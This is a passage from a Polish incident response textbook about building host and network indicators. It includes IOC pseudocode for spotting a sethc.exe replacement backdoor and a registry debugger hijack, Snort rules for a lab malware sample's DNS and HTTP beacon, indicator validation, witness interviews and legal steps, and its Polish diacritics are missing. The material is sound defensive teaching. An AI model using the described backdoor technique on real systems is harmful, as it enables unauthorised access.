Na pocztek mona sprawdzi, czy plik ten jest rzeczywicie tym, ktrym powinien by. Skrt MD5
pliku c:\windows\system32\sethc.exe w systemie Windows 7 SP0 to
40abe0e4b66ea08b1ffa07ceac312402. Za pomoc programu PEView, opisanego w rozdziale 15.,
dowiemy si te, e znacznik czasu zapisany w nagwku PE tego pliku to 2009/07/14 00:13:57 UTC.
Gdybymy mogli w kadym systemie Windows 7 SP0 sprawdza, czy plik c:\windows\system32\sethc.exe
ma te dwie cechy, to mielibymy doskonae narzdzie do wykrywania zagroe w tych systemach.
Poniej znajduje si przykadowy wskanik napisany przy uyciu pseudokodu. Pamitaj, e
mechanizm szukajcy bdzie wykonywa ten kod na kadym odwiedzonym wle. Pierwsza
instrukcja if sprawdza, czy proces dotar do pliku c:\windows\system32\sethc.exe.
if
{
(cieka do pliku == "c:\windows\system32\sethc.exe")
}
then
if
{
(skrt MD5 pliku != 40abe0e4b66ea08b1ffa07ceac312402)
AND
(Znacznik czasu w nagwku PE != 2009/07/14 00:13:57 UTC)
}
then
podnie alarm
Oczywicie jest mao prawdopodobne, e w caym przedsibiorstwie bdzie uywany wycznie

system Windows 7 SP0. Dlatego naley znale wersje i numery poprawek wszystkich systemw,
ktre bd przeszukiwane, i napisa dodatkow logik dla kadego z nich.
if
{
}
then
if
{
(skrt MD5 pliku !=
(40abe0e4b66ea08b1ffa07ceac312402)
OR
(8c545f6f1ba83c15b8b02ee4aa62ff11)
)
AND
(Znacznik czasu w nagwku PE !=
2009/07/14 00:13:57 UTC)
OR
(2010/11/20 10:48:58 UTC)
)
}
then
podnie alarm
Taki wskanik szybko staje si trudny do opanowania. Lepszym sposobem jego implementacji
jest uycie operatora NOR lub wykonywanie porwna z zawartoci tabel wyszukiwania. Niestety
tylko nieliczne jzyki do definiowania wskanikw zagroenia obsuguj operator NOR i tabele
wyszukiwania. Dlatego podczas implementowania tego wskanika musielimy si zastanowi nad
tym, jakie inne metadane s dostpne. Z naszego dowiadczenia wynika, e hakerzy zawsze
zamieniaj plik sethc.exe na cmd.exe. Porwnujc rozmiary plikw w reprezentatywnej grupie
rodowisk, odkrylimy, e rozmiar pliku cmd.exe zawsze jest wikszy od najwikszego pliku
sethc.exe o przynajmniej 10%. Na podstawie tych ustale napisalimy poniszy pseudokod,
ktry nazywamy te Wskanikiem podmiany sethc na CMD:
if
{
}
then
if
{
(rozmiar pliku >= 300000)
}
then
podnie alarm
Ten wskanik jest prostszy i szybciej dziaa, poniewa nie wymaga obliczania skrtu.
Oczywicie zdajemy sobie spraw, e plik sethc.exe moe te zosta podmieniony na plik
o rozmiarze wikszym o warto nieprzekraczajc okrelonej przez nas rnicy. Ryzyko
pomyki z tego powodu minimalizujemy przez dodanie testw dotyczcych innych czciowo
unikalnych atrybutw.
Aby dowiedzie si, czy zosta uyty debugger dotyczcy konkretnego obrazu, mona poszuka
odpowiednich kluczy w rejestrze. Poniej pokazujemy sposb wykorzystania klucza rejestru
czcego polecenie z debuggerem wykonywania obrazu sethc.exe. Jeli klucz ten ma jakkolwiek
warto, system powinien zosta sprawdzony. Pamitaj, e wyszukiwarka wykona kod na kadym
wle odwiedzonym w procesie wyszukiwania. Pierwsza instrukcja if sprawdza, czy proces dotar
do odpowiedniego klucza rejestru. Poniszy pseudokod nazywa si Wskanikiem, czy sethc jest
debuggerem:
if
{
(Klucz rejestru ==
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\
Image File Execution Options\"
)
}
then
if
(warto klucza zawiera "sethc.exe")
then
podnie alarm
Dwa ostatnie fragmenty pseudokodu poczymy w celu utworzenia wskanikw zagroenia

w jzyku OpenIOC. Chcemy, aby system ogasza alarm, gdy warunki wskanikw systemu plikw
bd faszywe lub gdy zostanie znaleziony podany klucz rejestru. Na rysunku 5.2 przedstawiony
jest wskanik systemu plikw dotyczcy anomalii w plikach binarnych sethc.exe opisany wczeniej
jako Wskanik podmiany sethc na CMD. Zwr uwag, e informacje we wskaniku OpenIOC s
nieco inne ni w pseudokodzie. Przypomnij sobie, e wczeniej pisalimy, i znajomo ogranicze
uywanych narzdzi jest bardzo wana. W tym przypadku mona zauway dwie wane rnice.
Pierwsza to uycie niepenej cieki w formacie OpenIOC. Chcemy, aby wskanik dziaa bez
wzgldu na wolumin i dlatego uylimy warunku contains (zawiera) w odniesieniu do cieki
do pliku. Druga rnica polega na uyciu zakresu zamiast nierwnoci. Takie jest ograniczenie
uytego przez nas narzdzia. Mechanizm szukajcy nie obsuguje nierwnoci.
RYSUNEK 5.2. Wskanik systemu plikw dotyczcy podmiany pliku sethc.exe
Wersja OpenIOC wskanika rejestru, opisana pod nazw Wskanik, czy sethc jest debuggerem,
zostaa przedstawiona na rysunku 5.3. ciek rejestru podzielono na dwie czci, aby zmiecia si
na stronie.
RYSUNEK 5.3. Wskanik rejestru dotyczcy debuggerw pliku sethc.exe
Edytowanie wskanikw sieciowych

Wskaniki sieciowe maj przeznaczenie podobne do wskanikw hostowych, tzn. su
do szybkiego sprawdzania, czy okrelona sesja jest istotna dla ledztwa. Wybr waciwoci
i atrybutw zaley od moliwoci systemu monitorowania. Ponadto okrelaj one rodzaj
tworzonego wskanika. Wikszo wskanikw jest prosta, np.: jeli dany zbir bajtw znajduje
si w n pierwszych bajtw sesji, podnie alarm. Okres przydatnoci do uycia takich wskanikw
moe by ograniczony ze wzgldu na to, e haker moe zmieni swoje narzdzia lub procedury.
Ile sieciowych sygnatur widziae dla trojana zdalnego dostpu, takiego jak Poision Ivy?
Kady twrca szkodliwego oprogramowania (lub w tym przypadku edytor) ma do wyboru
wiele moliwoci, aby utrudni wykrycie tworzonej przez siebie paczki z informacjami. Jeeli
ledztwo potrwa duszy czas, z pewnoci bdziesz wielokrotnie edytowa sieciowe sygnatury
szkodliwego oprogramowania.
Wczeniej zbadalimy plik binarny o nazwie lab03-02.dll. Udao nam si zidentyfikowa artefakt
bufora DNS (nazwa hosta bufora DNS zawiera napis practicalmalwareanalysis.com), ktry mona
wykorzysta podczas przeczesywania hosta. Kontynuujemy analiz tego pliku w celu znalezienia
sygnatur sieciowych, ktre umoliwi zidentyfikowanie obecnoci tego szkodliwego programu.
Ju dowiedzielimy si, e analizowany przez nas plik binarny szuka nazwy hosta
practicalmalwareanalysis.com. Monitor sieci moe to atwo wychwyci. Jeli jednak zostan uyte
inne wersje wirusa, poleganie wycznie na sprawdzaniu szukanej nazwy hosta moe by nieskuteczne.
Ponadto moemy zaoy, e nasz plik binarny prbuje poczy si z tym zdalnym systemem, ale
aby utworzy lepszy wskanik, musimy dokadniej zbada ten plik. Szczegowo monitorowanie
sieci omawiamy w jednym z dalszych rozdziaw, ale przyjmijmy, e przechwycilimy ruch sieciowy
z dziaajcej sieci lub wystarczajco dobrze przeanalizowalimy szkodliwy program, aby zaobserwowa
zachowanie opisane poniej.
Za pomoc monitoringu portu UDP 53 pod ktem standardowych zapyta DNS, ktrych
gwne pola s pokazane poniej, mona przechwyci danie wyszukiwania:
DNS Query flags: 0x0100
Query Type: A
Query Class: IN
Query String: "practicalmalwareanalysis.com"
Jeli odniesiemy si do strony 27 dokumentu RFC 1035 Domain Implementation and

Specification, moemy zbudowa sygnatur dla formatu danych uytego w samym pakiecie.
Poniej znajduje si odpowiedni fragment wymienionego dokumentu RFC. Zawiera on opis tego,
czego powinnimy si spodziewa w czasie zapytania.
4.1.2. Format sekcji pytania
Sekcja pytania suy do przenoszenia zapytania w wikszoci zapyta, tzn. parametrw
definiujcych to, czego dotyczy pytanie. Sekcja ta zawiera wpisy QDCOUNT (najczciej 1),
z ktrych kady ma nastpujcy format:
1 1 1 1 1 1
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
| |
/ QNAME /
/ /
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
| QTYPE |
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
| QCLASS |
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
gdzie:
QNAME to nazwa domeny reprezentowana w postaci sekwencji etykiet, z ktrych kada
zawiera osiem bitw okrelajcych dugo i tak liczb oktetw. Nazwa domeny
jest zakoczona oktetem o zerowej dugoci reprezentujcym zerow etykiet
korzenia. Naley zauway, e pole to moe mie nieparzyst liczb oktetw.
Nie jest stosowane dopenianie.
QTYPE to zoony z dwch oktetw kod okrelajcy typ zapytania. Wartociami tego
pola mog by wszystkie kody dostpne dla pola TYPE oraz pewne bardziej
oglne kody, ktre mog pasowa do wicej ni jednego typu RR.
W INTERNECIE
Repozytorium dokumentw Request for Comments (RFC) na stronach Internet Engineering Task Force
http://www.ietf.org.
Z opisu pola QNAME zapytania dowiadujemy si, e proste wyszukiwanie acucha

practicalmalwareanalysis.com zakoczyoby si niepowodzeniem. Przesyka zawiera zakoczon
zerem sekwencj acuchw, z ktrych kady ma jeden oktet zarezerwowany na okrelenie
dugoci acucha. Naley si spodziewa, e pole QNAME tego zapytania powinno zawiera
nastpujce dane:
Length: 0x18
String: practicalmalwareanalysis
Length: 0x03
String: com
Terminating octet: 0x00
Korzystajc z podrcznika do Snort, moemy utworzy sygnatur, ktra bdzie powodowaa

alarm, gdy czujnik wykryje to konkretne zapytanie:
alert udp $HOME_NET any -> any 53 (
msg:"Lab03-02.dll Malware:practicalmalwareanalysis.com";
content:"|18|practicalmalwareanalysis|03|com|00|";
nocase; threshold: type limit, track by_src, count 1, seconds 300;
classtype:bad-unknown; sid:1000001; rev:1;
)
Sygnatura ta spowoduje alarm, gdy w ruchu UDP zostanie wykryta tre

|18|practicalmalwareanalysis|03|com|00| przy zastosowaniu wyszukiwania bez rozpoznawania
wielkoci liter. Opis tej sygnatury to Lab03-02.dll Malware: practicalmalwareanalysis.com, ale
alarm ten zostanie zgoszony przez kade wyszukiwanie. Prg powiadomie zosta dodany po to,
by zminimalizowa duplikacj zdarze.
Dla hakera zmiana statycznej nazwy hosta to aden problem. W programie mog nawet
znajdowa si inne domeny i adresy IP, ktrych nie udao si wykry podczas jego analizy.
Dlatego lepszy byby wskanik identyfikujcy rzeczywist komunikacj midzy szkodliwym
programem a miejscem zewntrznym. Aby przechwyci pakiety przesyane midzy tymi stronami,
naley pozwoli wirusowi dziaa w bezpieczny sposb. Jest to wieloetapowy proces, ktry w tym
rozdziale opisujemy tylko oglnie. Bardziej szczegowe informacje znajduj si w rozdziale 15.
W rodowisku izolowanym wykonalimy niej wymienione czynnoci, aby doprowadzi
do komunikacji szkodliwego programu z baz. Szczegowo o bezpiecznym wykonywaniu
szkodliwego oprogramowania dla celw analitycznych piszemy w rozdziale 15.
1. Rozpoczlimy monitorowanie izolowanej sieci za pomoc programu tcpdump.
2. Zaadowalimy do systemu ofiary bibliotek Windows XP i wywoalimy metod
installA.
3. Poczekalimy, a wirus wykona wyszukiwanie DNS i sprawdzilimy, czy pierwsze zapytanie
dotyczyo practicalmalwareanalysis.com.
4. Dodalimy domen practicalmalwareanalysis.com do lipnego serwera DNS, kierujc t

nazw domeny do systemu Linux z serwerem Apache rejestrujcym wszystkie dania.
5. Ponownie uruchomilimy test przez usunicie i ponowne zaadowanie biblioteki,
i wywoalimy metod installA.
6. Zaobserwowalimy, e poczenie ze zdalnym hostem zawiera jedno danie GET
pliku /serve.html.
7. Zatrzymalimy program tcpdump i przeanalizowalimy pakiet oraz prby poczenia
w programie Wireshark.
Okazao si, jak wida na rysunku 5.4, e szkodliwa biblioteka daa URI /serve.html. Ponadto
szkodliwy program dostarczy acuch aplikacji uytkownika user-ece3629572 do serwera sieciowego.
Na pierwszy rzut oka acuch ten wyglda na do unikatowy i moe kusi, aby uy go we wskaniku.
Niestety w tym przypadku haker skopiowa nazw maszyny do tego pola w pakiecie. Tak na marginesie,
pole to mona wykorzysta we wasnej sygnaturze do okrelenia rda poczenia, niezalenie od tego,
czy uywany jest NAT, czy serwer proxy.
RYSUNEK 5.4. Pocztkowa komunikacja zainicjowana przez szkodliw bibliotek

W tej sytuacji mamy bardzo saby wskanik. Biblioteka da URI, ktry moe generowa
faszywe alarmy. Jednak warto wdroy t sygnatur, aby zobaczy, ile ruchu uda si zidentyfikowa.
Ponisza regua Snort szuka acucha serve.html w znormalizowanym URI HTTP. Wyszukiwanie
jest przeprowadzane w ustalonych przepywach w komunikacji midzy klientem i serwerem:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
msg:"Lab03-02.dll Malware: practicalmalwareanalysis.com";
flow:established,to_server; content:"serve.html";
http_uri;classtype:bad-unknown; sid:1000002; rev:1;
)
Aby poprawi skuteczno wykrywania szkodliwej komunikacji, mona utworzy sygnatury

sieciowe identyfikujce dane zwracane przez zdalnego uczestnika tego procesu. Opisywany tu
szkodliwy program odbiera bd HTTP 404, ale dodatkowe informacje zwracane przez serwer mog
by interesujce. Gdy serwer w odpowiedzi przesya plik lub rozszerzon wiadomo o statusie
albo bdzie, mona to wykorzysta, poniewa ta cz komunikacji stwarza niewielkie ryzyko
generowania faszywych alarmw.
To by bardzo uproszczony przykad tworzenia tropu sieciowego. Jeli masz do dyspozycji
program Snort (lub zgodny z nim system wykrywania wama), znajdziesz wiele ksiek
i publikacji internetowych zawierajcych informacje, jak generowa skuteczne alarmy.
W INTERNECIE
Podrcznik Snort manual.snort.org
Snort IDS and IPS Toolkit, Beale, Caswell, Baker (Syngress Press 2007)
Weryfikacja
Wikszo prowadzonych przez nas ledztw obejmuje tysice systemw, a w wielu przypadkw ich
liczba przekraczaa sto tysicy. Take Twoja organizacja atwo moe osign tak liczb punktw
kocowych. Gdy do przeskanowania jest tyle jednostek, naley zna specyficzne cechy wskanikw
i wiedzie, ile jest generowanych danych. Bez wzgldu na to, czy uywasz systemu RI dla przedsibiorstw,
wdraasz program System Center Configuration Manager, czy skrypty powoki, musisz wyprbowa
swoje wskaniki na reprezentatywnej prbce przykadowych systemw w swoim rodowisku,
zanim uyjesz ich w duej iloci systemw.
W cyklu tworzenia wskanika przedstawionym na rysunku 5.1 pokazalimy, e podczas
weryfikacji wykonywane s dwa przegldy. Pierwszy nazywa si Dane dotyczce wskanika.
Wydaje si to oczywiste, ale po wygenerowaniu wskanika naley sprawdzi, czy dziaa tak, jak
powinien. Skuteczno wskanika moe znacznie si rni w zalenoci od tego, jakie waciwoci
testuje. Wczeniej opisalimy rnic midzy wskanikami zoonymi z bardzo konkretnych
waciwoci i wskanikami zoonymi z wielu rnych mao konkretnych i lunych atrybutw.
Dodatkowo waciwoci w nowym wskaniku nie powinny identyfikowa szkodliwego programu
lub szkodliwej aktywnoci tylko w okrelonym momencie cyklu istnienia. Zastanwmy si np.
nad nastpujcym typowym scenariuszem ataku.
1. Do organizacji zostaje wysana wiadomo e-mail zawierajca szkodliw tre. Jest ni

wykonywalny plik (podrzucajcy pliki), ktry dla nic niepodejrzewajcego uytkownika
wyglda jak dokument programu Word.
2. Uytkownik myli, e to prawdziwy dokument programu Word, wic prbuje go otworzy,
przez co uruchamia szkodliwy program.
3. Program ten podrzuca prawdziwy nieszkodliwy dokument programu Word i otwiera go
uytkownikowi, jednoczenie w tle pobierajc i uruchamiajc drugi szkodliwy plik.
4. Ten drugi szkodliwy plik usuwa pierwszy z dysku.
5. Drugi szkodliwy plik dziaa na swj sposb.
Mniej skuteczny wskanik moe sprawdza tylko skrt MD5, nazw pliku lub waciwoci pliku
podrzucajcego. Tego rodzaju wskaniki s z reguy generowane przez automaty skanujce poczt
elektroniczn w poszukiwaniu zagroe i mona je spotka w wielu rozsyanych nieformalnymi
kanaami arkuszach kalkulacyjnych z informacjami o zych plikach. S one przydatne na hocie
przez pewien czas, najczciej kilka sekund lub minut, dopki uytkownik nie uruchomi programu
podrzucajcego pliki. Gdyby natomiast analityk dokadniej przeanalizowa zawarto wiadomoci
e-mail i wygenerowa wskaniki na podstawie wiedzy o cyklu ataku, wykorzystaby take poniej
wyliczone waciwoci.
Wpis pliku w systemowym katalogu Prefetch.
Nazwa nieszkodliwego dokumentu programu Word w kluczu rejestru zawierajcym list
ostatnio uywanych plikw.
Jeli program podrzucajcy pliki wykorzysta wywoania API w celu pobrania plikw,
pobieranie drugiego programu mogo zosta zarejestrowane w historii przegldarki
uytkownika.
Wpisy w buforze DNS dla strony zawierajcej drugi szkodliwy program.
Metadane pliku drugiego szkodliwego programu.
Podsumujmy: kiedy chcemy zapewni, aby proces identyfikowa dane odnoszce si do
wskanika, musimy zadba o prawidowe uchwycenie we wskaniku tego, czego si szuka i jak si
to zmienia.
Drugi czsto stosowany typ weryfikacji to Dane dotyczce rodowiska. Krok ten ma na celu
porwnanie waciwoci wskanika ze rodowiskiem, w ktrym wskanik ten bdzie wdroony.
Etap ten informuje, czy waciwoci we wskaniku bd pasowa do rodowiska, i czsto zarzuca
ledczych wieloma faszywymi alarmami. Aby upewni si, czy nasz wskanik jest odpowiedni dla
danego rodowiska, naley wybra prbk czystych stacji roboczych i serwerw, ktre posu do
testowania wskanikw. Wdr wskanik w tych systemach i upewnij si, e parametry nie pasuj
do niezainfekowanych systemw. Jeli pasuj, zmodyfikuj wskanik lub przyjrzyj si jeszcze raz
pocztkowym danym, aby znale lepsze rozwizanie. Gdy wskanik bdzie ju satysfakcjonujcy,
nie powinien zgasza wielu faszywych alarmw i mona go wykorzysta w ledztwie. Zazwyczaj
trzeba czasu, aby uzna wskanik za cakowicie sprawdzony w nowym rodowisku.
Inn metod weryfikacji, ktr zawsze uwzgldniamy, jest zachowanie wskanika w rodowisku
i jego wpyw na to rodowisko. Jeli zesp wdroy wskanik hostowy w caym przedsibiorstwie,
analityk powinien upewni si, e wpyw tego na system jest dobrze znany. Bez wzgldu na to,
co spowoduje przestj, Ty bdziesz pierwszym, ktremu si za to oberwie. Majc wskanik gotowy
do testowania, znajd zbir systemw reprezentujcych rodowisko. Konkretnie mwic, w grupie
tej powinny znale si systemy serwerowe i rwnie komputery biurkowe. Wikszo narzdzi RI
inaczej wpywa na serwery ni na stacje robocze, poniewa systemy te rni si iloci pamici
RAM, iloci miejsca na dysku oraz zestawem uruchomionych aplikacji. Za pomoc menedera
zasobw mona sprawdzi, jakie obcienie jest generowane w przykadowych systemach i na
podstawie tej informacji stwierdzi, czy jest dopuszczalne. Wanym czynnikiem, ktry naley bra
pod uwag, jest te czas przeszukiwania wirtualnego rodowiska komputerowego. Jeeli operacja
jest zaplanowana dla wielu maszyn wirtualnych dziaajcych na tym samym sprzcie, istnieje
ryzyko wystpienia awarii lub tego, e zabraknie zasobw.
Analizowanie tropw wewntrznych

Omwilimy tropy pochodzce od systemw lub infrastruktury zabezpieczajcej, ale pierwsza
wiadomo o moliwym zdarzeniu moe nadej od uytkownika lub administratora.
Nie istniej adne skrypty Perl ani automaty, ktre byyby pomocne w takich sytuacjach.
Zesp RI moe by zmuszony do przeprowadzenia rozmw i spisania zezna wiadkw
incydentw. Cho nie trzeba nikogo szkoli, jak prowadzi takie przesuchania, warto pamita
o nastpujcych wskazwkach.
Dokadnie zapisuj wszystkie zeznania. Bd wybitnym archiwist. Zeznania z pierwszej
rki na temat incydentu mog nie by najbardziej dokadnym rdem informacji o tym, co
si wydarzyo, ale wiedza, kiedy uytkownik otworzy wiadomo e-mail lub co zauway na
stronie internetowej, moe si przyda w pniejszych etapach ledztwa. Najlepiej jest, gdy
dokumentacj podczas przesuchania sporzdza dodatkowa osoba. Ty jako gwny ledczy
powiniene skupi si na samej rozmowie.
Pozwl wiadkowi powiedzie, co ma do powiedzenia. wiadek powinien mwi wicej
ni Ty, a rozmowa powinna przebiega w dobrej atmosferze. Jest to wane, zwaywszy
na sytuacj, w jakiej ta osoba moe si znajdowa. Wyobra sobie, e kto z dziau
bezpieczestwa, z kim nigdy nie miae do czynienia, wpada, eby sobie z Tob
porozmawia. Staraj si przerywa tylko po to, by poprosi o dodatkowe wyjanienia,
i pozwl wiadkowi mwi tak, jak chce. Gdy ju powie wszystko, co pamita, wr
do aspektw wymagajcych dodatkowych wyjanie.
Unikaj pyta podchwytliwych i takich, na ktre mona odpowiedzie tylko tak lub nie.
Zadawaj otwarte pytania i notuj to, co przepytywana osoba przypomina sobie na temat
zaobserwowanych zdarze.
Zbierz fakty, zanim pozwolisz sobie na wydanie opinii. Jeli administrator systemu podj
pewne czynnoci po tym, jak zauway problem, poznaj szczegy tych dziaa i sporzd o
czasu, zanim spytasz go, dlaczego podj tak, a nie inn decyzj. Szczeglnie wane jest,
aby pozwoli mwi przepytywanej osobie bez konfrontacji. Negatywne reakcje ze strony
prowadzcego rozmow mog spowodowa, e rozmwca zacznie zataja pewne szczegy.
Wczaj inne osoby w odpowiednim czasie. Przeprowadzenie wywiadu z administratorami
sieci, ktrzy podjli dziaania po zauwaeniu ataku na sie, to jedno. A prowadzenie rozmw
z pracownikami podejrzanymi w sprawie to co cakiem innego. Dzia prawny powinien
suy rad i jego udzia w procesie jest niezbdny.
Musisz zanotowa, jakie podjto czynnoci i daty ich wykonania. Jeli masz dostp do dziennikw
lub notatek sporzdzanych przez administratorw albo innych pracownikw, rwnie je zabezpiecz.
W miar upywu czasu szczegy ulatuj z ludzkiej pamici, wic staraj si przeprowadzi
rozmowy jak najszybciej.
Analizowanie tropw zewntrznych

Czasami potrzebne s informacje ze rde zewntrznych. W takich przypadkach z reguy konieczne
jest zaangaowanie dziau prawnego, ktry powinien pomc w przygotowaniu wnioskw o udostpnienie
informacji i wezwa do sdu. Oglnie rzecz biorc, podmioty zewntrzne nie musz dostarcza
informacji na Twoje danie, ale niektre mog zapewni tak pomoc, jakiej mog udzieli bez
naraania siebie na niepotrzebne ryzyko.
W Stanach Zjednoczonych organizacje prywatne nie mog wystawia wezwa sdowych
do stawienia si przed wielk aw przysigych, nakazw sdowych na podstawie sekcji 2703(d)
ani zwykych wezwa do sdu, wic musz stosowa metody wymienione poniej.
Skadaj pozwy bez wstpnego okrelenia drugiej strony (tzw. John Doe lawsuits)
i wysyaj wezwania do sdu dostawcom i organizacjom posiadajcym rdowe
adresy lub adresy e-mail.
Wykorzystuj procedury postpowania przedsdowego w sprawie nakonienia podmiotw
zewntrznych do ujawnienia potrzebnych informacji. W niektrych stanach nie ma takiej
moliwoci.
Jeeli w gr wchodzi naruszenie praw autorskich, kwestie zwizane z ujawnianiem
tosamoci osoby naruszajcej te prawa reguluje ustawa Digital Millennium Copyright Act.
Zgaszaj incydent do odpowiednich organw ochrony porzdku publicznego z nadziej
na wszczcie przez nie ledztwa.
Pamitaj, e zewntrzne tropy mog prowadzi do innych ofiar. Cho pocztki kontaktu
bywaj trudne, po uzgodnieniu, jakie dane mog zosta wymienione, a jakie musz by chronione,
dalsza wsppraca moe by bardzo owocna.
Zoenie pozwu w celu uzyskania informacji

W zalenoci od lokalnych regulacji kodeksu postpowania cywilnego, radca prawny moe mie
moliwo wniesienia skargi w celu doprowadzenia do ujawnienia danych w postpowaniu
cywilnym. Narzdzia te mog przekona organizacj, np. dostawc usug internetowych, do
ujawnienia pewnych informacji o subskrybencie. Wnoszenie skarg to rutynowe dziaanie dla
kadego prawnika, ale moe on potrzebowa informacji od Twojego zespou. Kada sprawa jest
inna i dlatego musisz spotka si z prawnikami, aby dowiedzie si, jakich informacji potrzebuj
oraz jakie warunki musz zosta spenione, aby mona byo zapocztkowa proces. Etap ten
naley wcieli do planu reakcji na incydent.
Zgaszanie incydentu organom ochrony porzdku publicznego

Gdy zdecydujesz si szuka tropw na zewntrz organizacji, to zamiast polega na prawie cywilnym,
moesz zgosi spraw do odpowiednich organw ochrony porzdku publicznego. Decyzj w tym
zakresie podejmuje si na podstawie wielu czynnikw. Z naszego dowiadczenia wynika jednak,
e wikszo organizacji woli unika mieszania ich w sprawy organw pastwowych. Cho organy
takie maj znacznie wiksze moliwoci i dysponuj szerszym wachlarzem rodkw prawnych,
co pozwala im dziaa o wiele skuteczniej, organizacje wol ich nie angaowa z obawy przed
problemami wizerunkowymi. W Stanach Zjednoczonych ujawnienie przestpstwa jest wymagane
tylko w nielicznych przypadkach. Radca prawny dobrze wie, gdzie ley granica, i na pewno
odpowiednio Ci poinformuje.
Jeli tropy prowadz do obcych podmiotw, np. dostawcw usug internetowych albo dostawcw
usug hostingowych, proces zdobywania informacji moe si jeszcze bardziej skomplikowa. Rzdy
obcych pastw z reguy wymagaj zoenia pozwu cywilnego oficjalnymi kanaami. Departament
Stanu i federalne organy ochrony porzdku publicznego utrzymuj relacje z rzdami obcych
pastw i umoliwiaj skadanie wnioskw o ujawnienie informacji przez firmy do kadego z nich.
Cay ten proces moe do dugo potrwa, ale nieraz spotkalimy si z sytuacj, gdy firma, wiedzc,
e oficjalne dokumenty zostay zoone, jest skonna wsppracowa w mniej formalny sposb.
Skorzystanie z pomocy organw ochrony porzdku publicznego ma kilka zalet. Jak napisalimy
wczeniej, organy te maj o wiele wiksze moliwoci w zakresie prowadzenia ledztw i cigania.
Dziaaj na cakiem innych zasadach. Gdy np. funkcjonariusz dorczy firmie wezwanie do
stawienia si w sdzie w celu ujawnienia informacji o subskrybentach lub klientach, z reguy
szybciej otrzymuje odpowied bez powiadamiania o tym anonimowej strony. Inn zalet jest to,
e organy ochrony porzdku publicznego mog wszcz dochodzenie w sprawie karnej przeciwko
podmiotowi i my nie musimy ponosi z tego tytuu adnych kosztw. Wprawdzie trzeba ponie
pewne koszty zwizane ze ledztwem, np. w celu przygotowania materiau dowodowego, ale s
one niewspmiernie mniejsze ni kopoty zwizane z powdztwem cywilnym. Jeli prawidowo
dokumentujesz incydent, dbasz o waciwe przechowywanie materiau dowodowego, masz jasny
i spjny obraz nielegalnej aktywnoci, ktra miaa miejsce, oraz potrafisz przekaza te informacje w jasny
i prosty sposb, organy cigania nie powinny mie problemu z podjciem dziaa niedozwolonych
w sektorze publicznym, takich jak odnalezienie i zatrzymanie sprztu w prywatnych posiadociach
oraz wydobycie dziennikw z witryn internetowych. Pamitaj, e organizacja zawsze moe wej
na drog postpowania cywilnego, niezalenie od wyniku postpowania karnego. Ciar dowodu

w postpowaniu cywilnym zapewnia powodzenie w drodze wyszoci dowodu, a nie ponad
wszelk wtpliwo, i moe pomc w uzyskaniu odszkodowania oraz zwrotu kosztw
prowadzenia ledztwa.
Inn zalet jest perspektywa. Organy federalne zazwyczaj, cho moe nie od razu, maj
moliwo gromadzenia danych od wielu ofiar oraz mog rozpoznawa wzorce i techniki.
Informacje te, jeli zostan odpowiednio przekazane, mog pomc w procesie naprawy
i unikniciu przyszych incydentw. Najwiksz trudnoci jest utrzymanie kontaktu
z powiadomionymi organami. Ich gwnym celem jest skarenie, a wic rozpowszechnianie
informacji to ostatnia rzecz, jak chc si zajmowa.
Wiele organw udziela si na forach branowych sucych do wymiany informacji z incydentw.
W grupach tych mona dowiedzie si, jakie problemy maj inni z Twojej brany, oraz nawiza
cenne kontakty. Aktualnie prnie dziaaj i s bardzo pomocne nastpujce grupy.
Infraguard sponsorowana przez FBI grupa skupiajca si na kwestiach ochrony
infrastruktury krytycznej.
FS-ISAC Financial Services Information Sharing and Analysis Center.
DIB-CS/IA Defense Industrial Base Cyber Security/Information Assurance.
W INTERNECIE
Infraguard www.infraguard.org
FS-ISAC www.fsisac.com
DIB-CS/IA dibnet.dod.mil
I CO Z TEGO
W rozdziale tym opisalimy techniki klasyfikacji tropw i sposoby postpowania z nimi w taki sposb,
aby jak najlepiej wykorzysta posiadane przez zesp zasoby. Niezalenie od metody zastosowanej
do poszukiwania w systemie wskanikw, musisz pamita o wymienionych niej kwestiach.
Wskaniki s tylko tak solidne jak narzdzie wyszukujce. Jedno narzdzie moe dostarcza
informacji o uytkowniku, a inne moe by lepsze do badania aktywnoci jdra. Musisz zna
ograniczenia wszystkich uywanych przez siebie narzdzi. Nie polegamy wycznie na wasnych
produktach i kady, kto tak robi, powinien by traktowany podejrzliwie.
Wskaniki przed wdroeniem zawsze naley dokadnie przetestowa i sprawdzi. Weryfikuj
i monitoruj ich skuteczno take podczas wykorzystywania w produkcji. Testy wykonuj
w swoich podstawowych systemach operacyjnych i systemach, o ktrych wiadomo, e ich
zabezpieczenia zostay zamane.
Podczas ledztwa wsppracuj z radc prawnym szczeglnie wtedy, gdy tropy prowadz
do podmiotw zewntrznych.
PYTANIA
1. Wygeneruj wskaniki hostowe dla pliku Lab03-03.exe z ksiki Practical Malware Analysis
(practicalmalwareanalysis.com/labs).
2. W lutym 2013 roku firma Mandiant opublikowaa raport zawierajcy szczegow analiz
grupy o nazwie APT 1. W raporcie tym opisano typowy przebieg ataku zaobserwowany
w wielu organizacjach. W podrozdziale zatytuowanym APT 1: Attack Lifecycle
(Cykl ataku grupy APT 1) zawarto opis typowego procesu przeprowadzania rozpoznania
wewntrznego. Korzystajc z opisanej metody, wygeneruj zestaw wskanikw, ktre
pomog Twojej organizacji zidentyfikowa aktywno tego rodzaju. Pamitaj, e wskanik
metodyczny nie musi identyfikowa szkodliwego programu. Uwzgldnij zarwno wskaniki
hostowe, jak i sieciowe.
3. Wygeneruj hostowe i sieciowe wskaniki dla pliku Lab06-02.exe z ksiki Practical Malware
Analysis (practicalmalwareanalysis.com/labs). Moesz wygenerowa bardzo skuteczne
sygnatury sieciowe, jeli wykonasz dynamiczn analiz tego pliku i dowiesz si, czego
program ten szuka.
ROZDZIA 6.
Okrelanie
zasigu incydentu
W
tym rozdziale przedstawiamy techniki pozwalajce poczy metody wykrywania i opisu
incydentw ze sposobami zbierania i analizy danych. Innymi sowy, czymy dwie
najwaniejsze czci tej ksiki. Na podstawie prawdziwych zdarze pokazujemy krok
po kroku, jak naley przeglda dane pocztkowe, rozwija tropy, gromadzi wstpny materia dowodowy,
wykonywa wysokopoziomowe przegldy oraz dobiera odpowiednie metody zbierania i przechowywania
